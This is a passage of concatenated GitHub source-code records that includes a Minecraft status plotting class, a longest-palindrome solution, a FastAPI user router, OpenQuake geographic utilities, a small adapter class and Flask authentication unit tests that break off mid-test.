plt\nfrom mpldatacursor import datacursor\nfrom change_statistics import IntervalDataSink\n\n\nclass StatusInformationPlot(IntervalDataSink.IntervalDataSink):\n\n def __init__(self):\n super(StatusInformationPlot, self).__init__()\n self.timepoints = []\n self.worldFullTimeTicks = []\n self.loaded_chunks = []\n self.changed_chunks = []\n self.tile_entities = []\n self.changed_tile_entities = []\n self.entities = []\n self.changed_entities = []\n self.online_players = []\n self.diff_times = [] # ms\n\n\n def receiveIntervalData(self, intervalData):\n for entry in intervalData.status_entries:\n self.timepoints.append(entry[\"logTime\"])\n self.worldFullTimeTicks.append(entry[\"worldFullTime\"])\n self.loaded_chunks.append(entry[\"loadedChunks\"])\n self.changed_chunks.append(entry[\"changedChunks\"])\n self.tile_entities.append(entry[\"tileEntities\"])\n self.changed_tile_entities.append(entry[\"changedTileEntities\"])\n self.entities.append(entry[\"entities\"])\n self.changed_entities.append(entry[\"changedEntities\"])\n self.online_players.append(entry[\"onlinePlayers\"])\n self.diff_times.append(entry[\"totalStateDiffTime\"])\n\n\n def noMoreIntervals(self):\n fig, ax = plt.subplots()\n ax.plot(self.timepoints, self.loaded_chunks, label='#loaded chunks', linestyle=\"-\", color='g')\n\n ax.plot(self.timepoints, self.tile_entities, label='#tile entities', color='orange')\n ax.plot(self.timepoints, self.entities, label='#entities', color='red')\n #ax.plot(self.timepoints, self.changed_entities, label='#changed entities', linestyle='--', color='red')\n\n ax.plot(self.timepoints, self.diff_times, label='#time for statediff [ms]', color='black')\n\n ax2 = ax.twinx()\n ax2.plot(self.timepoints, self.online_players, label='#online players', color='b')\n #ax2.plot(self.timepoints, self.changed_chunks, label='#changed chunks', linestyle='--', color='g')\n #ax2.plot(self.timepoints, self.changed_tile_entities, label='#changed tile entities', linestyle='--', color='orange')\n\n # fix legend\n # lines, labels = ax.get_legend_handles_labels()\n # lines2, labels2 = ax2.get_legend_handles_labels()\n # ax.legend(lines + lines2, labels + labels2, loc=2)\n ax.legend(loc=2) # upper left\n ax2.legend(loc=1) # upper right\n\n ax.set(xlabel='Time', title='Status information')\n ax.grid()\n datacursor()\n plt.show()","repo_name":"phylib/MinecraftNDN-RAFNET19","sub_path":"gamestate-changes/change_statistics/intervalDataSinks/plotStatusInformation.py","file_name":"plotStatusInformation.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"5325940964","text":"class Solution:\n def isPalindrome(self, A, i, j):\n while i >= 0 and j < len(A) and A[i] == A[j]:\n i -= 1\n j += 1\n\n if self.mx < j - i - 1:\n self.mx = j - i - 1\n self.start = i + 1\n\n\n def longestPalindrome(self, A):\n self.mx = 1\n self.start = 0\n n = len(A)\n\n if n < 2:\n return A\n\n for i in range(n):\n self.isPalindrome(A, i, i)\n self.isPalindrome(A, i, i+1)\n\n return A[self.start:self.start+self.mx]\n\n\nif __name__ == '__main__':\n A = \"aacabakaca\"\n B = Solution()\n print(B.longestPalindrome(A))\n","repo_name":"srajsonu/LeetCode-Solutions-Python","sub_path":"Amazon/5. Longest Palindromic Substring.py","file_name":"5. Longest Palindromic Substring.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18649137120","text":"from fastapi import Response, status, HTTPException, Depends, APIRouter\nfrom .. import models, schemas, utils, oauth2\nfrom sqlalchemy.orm import Session\nfrom ..database import get_db\nfrom typing import List\n\nrouter = APIRouter(prefix=\"/user\", tags=[\"Users\"])\n\n\n@router.get(\n \"/get_all\",\n status_code=status.HTTP_200_OK,\n response_model=List[schemas.UserOut],\n)\nasync def get_users(db: Session = Depends(get_db),\n current_user: int = Depends(oauth2.get_current_user)\n ):\n users = db.query(models.User).all()\n return users\n\n\n@router.get(\"/get\", status_code=status.HTTP_200_OK, response_model=schemas.UserOut)\nasync def get_user(id: int, db: Session = Depends(get_db),\n current_user: int = Depends(oauth2.get_current_user)\n \n ):\n user = db.query(models.User).filter(models.User.id == id).first()\n if not user:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"User with id {id} does not exits\",\n )\n return user\n\n\n@router.post(\"/create\", status_code=status.HTTP_201_CREATED, response_model=schemas.UserOut)\nasync def create_user(\n user: schemas.UserIn,\n db: Session = Depends(get_db),\n admin: str = Depends(oauth2.verify_admin),\n):\n hashed_password = utils.hash_password(user.password)\n user.password = hashed_password\n new_user = models.User(**user.dict())\n db.add(new_user)\n db.commit()\n db.refresh(new_user)\n return new_user\n\n@router.delete(\"/delete\", status_code=status.HTTP_204_NO_CONTENT)\nasync def delete_user(\n id: int,\n db: Session = Depends(get_db),\n admin: str = Depends(oauth2.verify_admin),\n):\n user_query = db.query(models.User).filter(models.User.id == id)\n user = user_query.first()\n if user == None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"user with id: {id} does not exist\")\n\n user_query.delete(synchronize_session=False)\n db.commit()\n return Response(status_code=status.HTTP_204_NO_CONTENT)\n","repo_name":"ajordanb/fastapi-pg-template","sub_path":"app/routers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5108836581","text":"import math\nimport logging\nimport operator\nimport collections\n\nimport numpy\nfrom scipy.spatial import cKDTree\nimport shapely.geometry\n\nfrom openquake.hazardlib.geo import geodetic\nfrom openquake.baselib.slots import with_slots\n\nU32 = numpy.uint32\nKM_TO_DEGREES = 0.0089932 # 1 degree == 111 km\nDEGREES_TO_RAD = 0.01745329252 # 1 radians = 57.295779513 degrees\nEARTH_RADIUS = geodetic.EARTH_RADIUS\nspherical_to_cartesian = geodetic.spherical_to_cartesian\nSphericalBB = collections.namedtuple('SphericalBB', 'west east north south')\n\n\ndef angular_distance(km, lat, lat2=None):\n \"\"\"\n Return the angular distance of two points at the given latitude.\n\n >>> '%.3f' % angular_distance(100, lat=40)\n '1.174'\n >>> '%.3f' % angular_distance(100, lat=80)\n '5.179'\n \"\"\"\n if lat2 is not None:\n # use the largest latitude to compute the angular distance\n lat = max(abs(lat), abs(lat2))\n return km * KM_TO_DEGREES / math.cos(lat * DEGREES_TO_RAD)\n\n\nclass SiteAssociationError(Exception):\n \"\"\"Raised when there are no sites close enough\"\"\"\n\n\nclass _GeographicObjects(object):\n \"\"\"\n Store a collection of geographic objects, i.e. objects with lons, lats.\n It is possible to extract the closest object to a given location by\n calling the method .get_closest(lon, lat).\n \"\"\"\n def __init__(self, objects):\n self.objects = objects\n if hasattr(objects, 'lons'):\n lons = objects.lons\n lats = objects.lats\n depths = objects.depths\n elif isinstance(objects, numpy.ndarray):\n lons = objects['lon']\n lats = objects['lat']\n try:\n depths = objects['depth']\n except ValueError: # no field of name depth\n depths = numpy.zeros_like(lons)\n self.kdtree = cKDTree(spherical_to_cartesian(lons, lats, depths))\n\n def get_closest(self, lon, lat, depth=0):\n \"\"\"\n Get the closest object to the given longitude and latitude\n and its distance.\n\n :param lon: longitude in degrees\n :param lat: latitude in degrees\n :param depth: depth in km (default 0)\n :returns: (object, distance)\n \"\"\"\n xyz = spherical_to_cartesian(lon, lat, depth)\n min_dist, idx = self.kdtree.query(xyz)\n return self.objects[idx], min_dist\n\n def assoc(self, sitecol, assoc_dist, mode):\n \"\"\"\n :param sitecol: a (filtered) site collection\n :param assoc_dist: the maximum distance for association\n :param mode: 'strict', 'warn' or 'filter'\n :returns: (filtered site collection, filtered objects)\n \"\"\"\n assert mode in 'strict warn filter', mode\n dic = {}\n for sid, lon, lat in zip(sitecol.sids, sitecol.lons, sitecol.lats):\n obj, distance = self.get_closest(lon, lat)\n if assoc_dist is None:\n dic[sid] = obj # associate all\n elif distance <= assoc_dist:\n dic[sid] = obj # associate within\n elif mode == 'warn':\n dic[sid] = obj # associate outside\n logging.warn('Association to %d km from site (%s %s)',\n int(distance), lon, lat)\n elif mode == 'filter':\n pass # do not associate\n elif mode == 'strict':\n raise SiteAssociationError(\n 'There is nothing closer than %s km '\n 'to site (%s %s)' % (assoc_dist, lon, lat))\n if not dic:\n raise SiteAssociationError(\n 'No sites could be associated within %s km' % assoc_dist)\n return (sitecol.filtered(dic),\n numpy.array([dic[sid] for sid in sorted(dic)]))\n\n def assoc2(self, assets_by_site, assoc_dist, mode):\n \"\"\"\n Associated a list of assets by site to the site collection used\n to instantiate GeographicObjects.\n\n :param assets_by_sites: a list of lists of assets\n :param assoc_dist: the maximum distance for association\n :param mode: 'strict', 'warn' or 'filter'\n :returns: (filtered site collection, filtered assets by site)\n \"\"\"\n assert mode in 'strict warn filter', mode\n self.objects.filtered # self.objects must be a SiteCollection\n assets_by_sid = collections.defaultdict(list)\n for assets in assets_by_site:\n lon, lat = assets[0].location\n obj, distance = self.get_closest(lon, lat)\n if distance <= assoc_dist:\n # keep the assets, otherwise discard them\n assets_by_sid[obj['sids']].extend(assets)\n elif mode == 'strict':\n raise SiteAssociationError(\n 'There is nothing closer than %s km '\n 'to site (%s %s)' % (assoc_dist, lon, lat))\n elif mode == 'warn':\n logging.warn('Discarding %s, lon=%.5f, lat=%.5f',\n assets, lon, lat)\n sids = sorted(assets_by_sid)\n if not sids:\n raise SiteAssociationError(\n 'Could not associate any site to any assets within the '\n 'asset_hazard_distance of %s km' % assoc_dist)\n assets_by_site = [\n sorted(assets_by_sid[sid], key=operator.attrgetter('ordinal'))\n for sid in sids]\n return self.objects.filtered(sids), assets_by_site\n\n\ndef assoc(objects, sitecol, assoc_dist, mode):\n \"\"\"\n Associate geographic objects to a site collection.\n\n :param objects:\n something with .lons, .lats or ['lon'] ['lat'], or a list of lists\n of objects with a .location attribute (i.e. assets_by_site)\n :param assoc_dist:\n the maximum distance for association\n :param mode:\n if 'strict' fail if at least one site is not associated\n if 'error' fail if all sites are not associated\n :returns: (filtered site collection, filtered objects)\n \"\"\"\n if isinstance(objects, numpy.ndarray) or hasattr(objects, 'lons'):\n # objects is a geo array with lon, lat fields or a mesh-like instance\n return _GeographicObjects(objects).assoc(sitecol, assoc_dist, mode)\n else: # objects is the list assets_by_site\n return _GeographicObjects(sitecol).assoc2(objects, assoc_dist, mode)\n\n\ndef clean_points(points):\n \"\"\"\n Given a list of :class:`~openquake.hazardlib.geo.point.Point` objects,\n return a new list with adjacent duplicate points removed.\n \"\"\"\n if not points:\n return points\n\n result = [points[0]]\n for point in points:\n if point != result[-1]:\n result.append(point)\n return result\n\n\ndef line_intersects_itself(lons, lats, closed_shape=False):\n \"\"\"\n Return ``True`` if line of points intersects itself.\n Line with the last point repeating the first one considered\n intersecting itself.\n\n The line is defined by lists (or numpy arrays) of points'\n longitudes and latitudes (depth is not taken into account).\n\n :param closed_shape:\n If ``True`` the line will be checked twice: first time with\n its original shape and second time with the points sequence\n being shifted by one point (the last point becomes first,\n the first turns second and so on). This is useful for\n checking that the sequence of points defines a valid\n :class:`~openquake.hazardlib.geo.polygon.Polygon`.\n \"\"\"\n assert len(lons) == len(lats)\n\n if len(lons) <= 3:\n # line can not intersect itself unless there are\n # at least four points\n return False\n\n west, east, north, south = get_spherical_bounding_box(lons, lats)\n proj = OrthographicProjection(west, east, north, south)\n\n xx, yy = proj(lons, lats)\n if not shapely.geometry.LineString(list(zip(xx, yy))).is_simple:\n return True\n\n if closed_shape:\n xx, yy = proj(numpy.roll(lons, 1), numpy.roll(lats, 1))\n if not shapely.geometry.LineString(list(zip(xx, yy))).is_simple:\n return True\n\n return False\n\n\ndef get_longitudinal_extent(lon1, lon2):\n \"\"\"\n Return the distance between two longitude values as an angular measure.\n Parameters represent two longitude values in degrees.\n\n :return:\n Float, the angle between ``lon1`` and ``lon2`` in degrees. Value\n is positive if ``lon2`` is on the east from ``lon1`` and negative\n otherwise. Absolute value of the result doesn't exceed 180 for\n valid parameters values.\n \"\"\"\n return (lon2 - lon1 + 180) % 360 - 180\n\n\ndef get_bounding_box(obj, maxdist):\n \"\"\"\n Return the dilated bounding box of a geometric object\n \"\"\"\n if hasattr(obj, 'get_bounding_box'):\n return obj.get_bounding_box(maxdist)\n bbox = obj.polygon.get_bbox()\n a1 = maxdist * KM_TO_DEGREES\n a2 = angular_distance(maxdist, bbox[1], bbox[3])\n return bbox[0] - a2, bbox[1] - a1, bbox[2] + a2, bbox[3] + a1\n\n\ndef get_spherical_bounding_box(lons, lats):\n \"\"\"\n Given a collection of points find and return the bounding box,\n as a pair of longitudes and a pair of latitudes.\n\n Parameters define longitudes and latitudes of a point collection\n respectively in a form of lists or numpy arrays.\n\n :return:\n A tuple of four items. These items represent western, eastern,\n northern and southern borders of the bounding box respectively.\n Values are floats in decimal degrees.\n :raises ValueError:\n If points collection has the longitudinal extent of more than\n 180 degrees (it is impossible to define a single hemisphere\n bound to poles that would contain the whole collection).\n \"\"\"\n north, south = numpy.max(lats), numpy.min(lats)\n west, east = numpy.min(lons), numpy.max(lons)\n assert (-180 <= west <= 180) and (-180 <= east <= 180), (west, east)\n if get_longitudinal_extent(west, east) < 0:\n # points are lying on both sides of the international date line\n # (meridian 180). the actual west longitude is the lowest positive\n # longitude and east one is the highest negative.\n if hasattr(lons, 'flatten'):\n # fixes test_surface_crossing_international_date_line\n lons = lons.flatten()\n west = min(lon for lon in lons if lon > 0)\n east = max(lon for lon in lons if lon < 0)\n if not all((get_longitudinal_extent(west, lon) >= 0\n and get_longitudinal_extent(lon, east) >= 0)\n for lon in lons):\n raise ValueError('points collection has longitudinal extent '\n 'wider than 180 deg')\n return SphericalBB(west, east, north, south)\n\n\n@with_slots\nclass OrthographicProjection(object):\n \"\"\"\n Callable OrthographicProjection object that can perform both forward\n and reverse projection (converting from longitudes and latitudes to x\n and y values on 2d-space and vice versa). The call takes three\n arguments: first two are numpy arrays of longitudes and latitudes *or*\n abscissae and ordinates of points to project and the third one\n is a boolean that allows to choose what operation is requested --\n is it forward or reverse one. ``True`` value given to third\n positional argument (or keyword argument \"reverse\") indicates\n that the projection of points in 2d space back to earth surface\n is needed. The default value for \"reverse\" argument is ``False``,\n which means forward projection (degrees to kilometers).\n\n Raises ``ValueError`` in forward projection\n mode if any of the target points is further than 90 degree\n (along the great circle arc) from the projection center.\n\n Parameters are given as floats, representing decimal degrees (first two\n are longitudes and last two are latitudes). They define a bounding box\n in a spherical coordinates of the collection of points that is about\n to be projected. The center point of the projection (coordinates (0, 0)\n in Cartesian space) is set to the middle point of that bounding box.\n The resulting projection is defined for spherical coordinates that are\n not further from the bounding box center than 90 degree on the great\n circle arc.\n\n The result projection is of type `Orthographic\n `_.\n This projection is prone to distance, area and angle distortions\n everywhere outside of the center point, but still can be used for\n checking shapes: verifying if line intersects itself (like in\n :func:`line_intersects_itself`) or if point is inside of a polygon\n (like in :meth:`openquake.hazardlib.geo.polygon.Polygon.discretize`). It\n can be also used for measuring distance to an extent of around 700\n kilometers (error doesn't exceed 1 km up until then).\n \"\"\"\n _slots_ = ('west east north south lambda0 phi0 '\n 'cos_phi0 sin_phi0 sin_pi_over_4').split()\n\n @classmethod\n def from_lons_lats(cls, lons, lats):\n return cls(*get_spherical_bounding_box(lons, lats))\n\n def __init__(self, west, east, north, south):\n self.west = west\n self.east = east\n self.north = north\n self.south = south\n self.lambda0, self.phi0 = numpy.radians(\n get_middle_point(west, north, east, south))\n self.cos_phi0 = numpy.cos(self.phi0)\n self.sin_phi0 = numpy.sin(self.phi0)\n self.sin_pi_over_4 = (2 ** 0.5) / 2\n\n def __call__(self, lons, lats, reverse=False):\n if not reverse:\n lambdas, phis = numpy.radians(lons), numpy.radians(lats)\n cos_phis = numpy.cos(phis)\n lambdas -= self.lambda0\n # calculate the sine of the distance between projection center\n # and each of the points to project\n sin_dist = numpy.sqrt(\n numpy.sin((self.phi0 - phis) / 2.0) ** 2.0\n + self.cos_phi0 * cos_phis * numpy.sin(lambdas / 2.0) ** 2.0\n )\n if (sin_dist > self.sin_pi_over_4).any():\n raise ValueError('some points are too far from the projection '\n 'center lon=%s lat=%s' %\n (numpy.degrees(self.lambda0),\n numpy.degrees(self.phi0)))\n xx = numpy.cos(phis) * numpy.sin(lambdas)\n yy = (self.cos_phi0 * numpy.sin(phis) - self.sin_phi0 * cos_phis\n * numpy.cos(lambdas))\n return xx * EARTH_RADIUS, yy * EARTH_RADIUS\n else:\n # \"reverse\" mode, arguments are actually abscissae\n # and ordinates in 2d space\n xx, yy = lons / EARTH_RADIUS, lats / EARTH_RADIUS\n cos_c = numpy.sqrt(1 - (xx ** 2 + yy ** 2))\n phis = numpy.arcsin(cos_c * self.sin_phi0 + yy * self.cos_phi0)\n lambdas = numpy.arctan2(\n xx, self.cos_phi0 * cos_c - yy * self.sin_phi0)\n xx = numpy.degrees(self.lambda0 + lambdas)\n yy = numpy.degrees(phis)\n # shift longitudes greater than 180 back into the western\n # hemisphere, that is in range [0, -180], and longitudes\n # smaller than -180, to the heastern emisphere [0, 180]\n idx = xx >= 180.\n xx[idx] = xx[idx] - 360.\n idx = xx <= -180.\n xx[idx] = xx[idx] + 360.\n return xx, yy\n\n\ndef get_middle_point(lon1, lat1, lon2, lat2):\n \"\"\"\n Given two points return the point exactly in the middle lying on the same\n great circle arc.\n\n Parameters are point coordinates in degrees.\n\n :returns:\n Tuple of longitude and latitude of the point in the middle.\n \"\"\"\n if lon1 == lon2 and lat1 == lat2:\n return lon1, lat1\n dist = geodetic.geodetic_distance(lon1, lat1, lon2, lat2)\n azimuth = geodetic.azimuth(lon1, lat1, lon2, lat2)\n return geodetic.point_at(lon1, lat1, azimuth, dist / 2.0)\n\n\ndef cartesian_to_spherical(vectors):\n \"\"\"\n Return the spherical coordinates for coordinates in Cartesian space.\n\n This function does an opposite to :func:`spherical_to_cartesian`.\n\n :param vectors:\n Array of 3d vectors in Cartesian space of shape (..., 3)\n :returns:\n Tuple of three arrays of the same shape as ``vectors`` representing\n longitude (decimal degrees), latitude (decimal degrees) and depth (km)\n in specified order.\n \"\"\"\n rr = numpy.sqrt(numpy.sum(vectors * vectors, axis=-1))\n xx, yy, zz = vectors.T\n lats = numpy.degrees(numpy.arcsin((zz / rr).clip(-1., 1.)))\n lons = numpy.degrees(numpy.arctan2(yy, xx))\n depths = EARTH_RADIUS - rr\n return lons.T, lats.T, depths\n\n\ndef triangle_area(e1, e2, e3):\n \"\"\"\n Get the area of triangle formed by three vectors.\n\n Parameters are three three-dimensional numpy arrays representing\n vectors of triangle's edges in Cartesian space.\n\n :returns:\n Float number, the area of the triangle in squared units of coordinates,\n or numpy array of shape of edges with one dimension less.\n\n Uses Heron formula, see http://mathworld.wolfram.com/HeronsFormula.html.\n \"\"\"\n # calculating edges length\n e1_length = numpy.sqrt(numpy.sum(e1 * e1, axis=-1))\n e2_length = numpy.sqrt(numpy.sum(e2 * e2, axis=-1))\n e3_length = numpy.sqrt(numpy.sum(e3 * e3, axis=-1))\n # calculating half perimeter\n s = (e1_length + e2_length + e3_length) / 2.0\n # applying Heron's formula\n return numpy.sqrt(s * (s - e1_length) * (s - e2_length) * (s - e3_length))\n\n\ndef normalized(vector):\n \"\"\"\n Get unit vector for a given one.\n\n :param vector:\n Numpy vector as coordinates in Cartesian space, or an array of such.\n :returns:\n Numpy array of the same shape and structure where all vectors are\n normalized. That is, each coordinate component is divided by its\n vector's length.\n \"\"\"\n length = numpy.sum(vector * vector, axis=-1)\n length = numpy.sqrt(length.reshape(length.shape + (1, )))\n return vector / length\n\n\ndef point_to_polygon_distance(polygon, pxx, pyy):\n \"\"\"\n Calculate the distance to polygon for each point of the collection\n on the 2d Cartesian plane.\n\n :param polygon:\n Shapely \"Polygon\" geometry object.\n :param pxx:\n List or numpy array of abscissae values of points to calculate\n the distance from.\n :param pyy:\n Same structure as ``pxx``, but with ordinate values.\n :returns:\n Numpy array of distances in units of coordinate system. Points\n that lie inside the polygon have zero distance.\n \"\"\"\n pxx = numpy.array(pxx)\n pyy = numpy.array(pyy)\n assert pxx.shape == pyy.shape\n if pxx.ndim == 0:\n pxx = pxx.reshape((1, ))\n pyy = pyy.reshape((1, ))\n result = numpy.array([\n polygon.distance(shapely.geometry.Point(pxx.item(i), pyy.item(i)))\n for i in range(pxx.size)\n ])\n return result.reshape(pxx.shape)\n\n\ndef fix_lon(lon):\n \"\"\"\n :returns: a valid longitude in the range -180 <= lon < 180\n\n >>> fix_lon(11)\n 11\n >>> fix_lon(181)\n -179\n >>> fix_lon(-182)\n 178\n \"\"\"\n return (lon + 180) % 360 - 180\n\n\ndef cross_idl(lon1, lon2, *lons):\n \"\"\"\n Return True if two longitude values define line crossing international date\n line.\n\n >>> cross_idl(-45, 45)\n False\n >>> cross_idl(-180, -179)\n False\n >>> cross_idl(180, 179)\n False\n >>> cross_idl(45, -45)\n False\n >>> cross_idl(0, 0)\n False\n >>> cross_idl(-170, 170)\n True\n >>> cross_idl(170, -170)\n True\n >>> cross_idl(-180, 180)\n True\n \"\"\"\n lons = (lon1, lon2) + lons\n l1, l2 = min(lons), max(lons)\n # a line crosses the international date line if the end positions\n # have different sign and they are more than 180 degrees longitude apart\n return l1 * l2 < 0 and abs(l1 - l2) > 180\n\n\ndef normalize_lons(l1, l2):\n \"\"\"\n An international date line safe way of returning a range of longitudes.\n\n >>> normalize_lons(20, 30) # no IDL within the range\n [(20, 30)]\n >>> normalize_lons(-17, +17) # no IDL within the range\n [(-17, 17)]\n >>> normalize_lons(-178, +179)\n [(-180, -178), (179, 180)]\n >>> normalize_lons(178, -179)\n [(-180, -179), (178, 180)]\n >>> normalize_lons(179, -179)\n [(-180, -179), (179, 180)]\n >>> normalize_lons(177, -176)\n [(-180, -176), (177, 180)]\n \"\"\"\n if l1 > l2: # exchange lons\n l1, l2 = l2, l1\n delta = l2 - l1\n if l1 < 0 and l2 > 0 and delta > 180:\n return [(-180, l1), (l2, 180)]\n elif l1 > 0 and l2 > 180 and delta < 180:\n return [(l1, 180), (-180, l2 - 360)]\n elif l1 < -180 and l2 < 0 and delta < 180:\n return [(l1 + 360, 180), (l2, -180)]\n return [(l1, l2)]\n\n\ndef within(bbox, lonlat_index):\n \"\"\"\n :param bbox: a bounding box in lon, lat\n :param lonlat_index: an rtree index in lon, lat\n :returns: array of indices within the bounding box\n \"\"\"\n lon1, lat1, lon2, lat2 = bbox\n set_ = set()\n for l1, l2 in normalize_lons(lon1, lon2):\n box = (l1, lat1, l2, lat2)\n set_ |= set(lonlat_index.intersection(box))\n return numpy.array(sorted(set_), numpy.uint32)\n\n\ndef plane_fit(points):\n \"\"\"\n This fits an n-dimensional plane to a set of points. See\n http://stackoverflow.com/questions/12299540/plane-fitting-to-4-or-more-xyz-points\n\n :parameter points:\n An instance of :class:~numpy.ndarray. The number of columns must be\n equal to three.\n :return:\n A point on the plane and the normal to the plane.\n \"\"\"\n points = numpy.transpose(points)\n points = numpy.reshape(points, (numpy.shape(points)[0], -1))\n assert points.shape[0] < points.shape[1], points.shape\n ctr = points.mean(axis=1)\n x = points - ctr[:, None]\n M = numpy.dot(x, x.T)\n return ctr, numpy.linalg.svd(M)[0][:, -1]\n","repo_name":"GFZ-Centre-for-Early-Warning/shakyground","sub_path":"openquake/hazardlib/geo/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":21869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"74240676084","text":"# Задание по программированию: Создание адаптера для класса\nclass MappingAdapter: # Адаптер к обработчику\n def __init__(self, adaptee):\n self.adaptee = adaptee\n\n def lighten(self, grid):\n self.adaptee.set_dim([len(grid[0]), len(grid)])\n self.adaptee.set_lights(\n (j, i)\n for i in range(0, len(grid))\n for j in range(len(grid[i]))\n if grid[i][j] == 1\n )\n self.adaptee.set_obstacles(\n (j, i)\n for i in range(0, len(grid))\n for j in range(len(grid[i]))\n if grid[i][j] == -1\n )\n return self.adaptee.generate_lights()\n","repo_name":"filivan/python-specialization","sub_path":"C2W3E2.py","file_name":"C2W3E2.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5383496196","text":"# ! /api/tests/auth_endpoint/test_auth.py\n# -*- coding: utf-8 -*-\n\"\"\"Tests for the auth endpoint\nContains basic tests for registration, login and logout\n\"\"\"\n\nimport json\nimport unittest\nfrom flask_jwt_extended import (create_access_token)\nfrom api.tests.conftest import BaseTestCase\n\n\ndef register_user(self, first_name, last_name, email, password):\n \"\"\"Register user method\"\"\"\n return self.client.post(\n '/api/v1/users/register',\n data=json.dumps(dict(\n first_name=first_name,\n last_name=last_name,\n email=email,\n password=password\n )),\n content_type='application/json',\n )\n\n\ndef login_user(self, email, password):\n \"\"\"Login user method\"\"\"\n return self.client.post(\n '/api/v1/users/login',\n data=json.dumps(dict(\n email=email,\n password=password\n )),\n content_type='application/json',\n )\n\n\nclass TestAuthEndpoint(BaseTestCase):\n \"\"\"Class that handles Auth Endpoint test\"\"\"\n\n # Registration tests\n def test_successful_registration(self):\n \"\"\" Test for user registration \"\"\"\n with self.client:\n response = register_user(\n self, 'Random', 'User', 'random@user.com', 'aaaAAA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'success')\n self.assertTrue(data['message'] ==\n \"Account for 'random@user.com' has been created.\")\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 201)\n\n def test_no_post_data_registration(self):\n \"\"\" Test empty dictionary \"\"\"\n with self.client:\n input_data = {}\n response = self.client.post('/api/v1/users/register',\n data=json.dumps(input_data),\n content_type=\"application/json\")\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == 'No input data provided.')\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 400)\n\n def test_existing_user_registration(self):\n \"\"\"Test if an already existing user tries to register\"\"\"\n register_user(self, 'Some', 'Name', 'another@gmail.com', 'aaaAAA111')\n with self.client:\n response = register_user(\n self, 'Dalin', 'Oluoch', 'another@gmail.com', 'aaaAAA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(\n data['message'] ==\n \"Sorry, email 'another@gmail.com' already exists.\")\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 400)\n\n def test_empty_fields(self):\n \"\"\"Test user has empty fields\"\"\"\n with self.client:\n response = register_user(\n self, '', '', '', '')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == 'Validation errors.')\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 422)\n\n def test_invalid_email(self):\n \"\"\"Test if user enters the wrong email\"\"\"\n with self.client:\n response = register_user(\n self, 'Dalin', 'Oluoch', 'anothergmail.com', 'aaaAAA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == 'Validation errors.')\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 422)\n\n def test_password_strength(self):\n \"\"\"Test if user enters strong password\"\"\"\n with self.client:\n response = register_user(\n self, 'Dalin', 'Oluoch', 'anothergmail.com', 'asdfasdf')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == 'Validation errors.')\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 422)\n\n # Login Tests\n def test_registered_user_login(self):\n \"\"\" Test for login of registered-user login \"\"\"\n # register a user\n register_user(self, 'some', 'name', 'another@gmail.com', 'aaaAAA111')\n\n # test logging in registered user\n with self.client:\n response = login_user(self, 'another@gmail.com', 'aaaAAA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'success')\n self.assertTrue(data['message'] == 'Successfully logged in.')\n self.assertTrue(data['token'])\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 200)\n\n def test_unregistered_user_login(self):\n \"\"\" Test for login of a not registered-user\"\"\"\n with self.client:\n response = login_user(self, 'another@gmail.com', 'aaaAAA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(\n data['message'] ==\n \"Sorry, email 'another@gmail.com' does not exist.\")\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 400)\n\n def test_login_failure(self):\n \"\"\"Wrong login credentials\n\n Wrong password\n \"\"\"\n # register a user\n register_user(self, 'some', 'name', 'the@user.com', 'aaaAAA111')\n\n # test logging in failure of a registered user - wrong password\n with self.client:\n response = login_user(self, 'the@user.com', 'Pa4s283dDI!')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == \"Wrong login credentials.\")\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 422)\n\n def test_invalid_email_login(self):\n \"\"\" Test for invalid email while logging in\"\"\"\n with self.client:\n response = login_user(self, 'joegmail.com', 'aaaAAA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == 'Validation errors.')\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 422)\n\n def test_short_password_login(self):\n \"\"\" Test for minimum length password\"\"\"\n with self.client:\n response = login_user(self, 'joe@gmail.com', 'aA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == 'Validation errors.')\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 422)\n\n # Test logout\n def test_successful_logout(self):\n \"\"\" Test logout headers token \"\"\"\n with self.client:\n access_token = create_access_token('test@user.com')\n headers = {\n 'Authorization': 'Bearer {}'.format(access_token)\n }\n response = 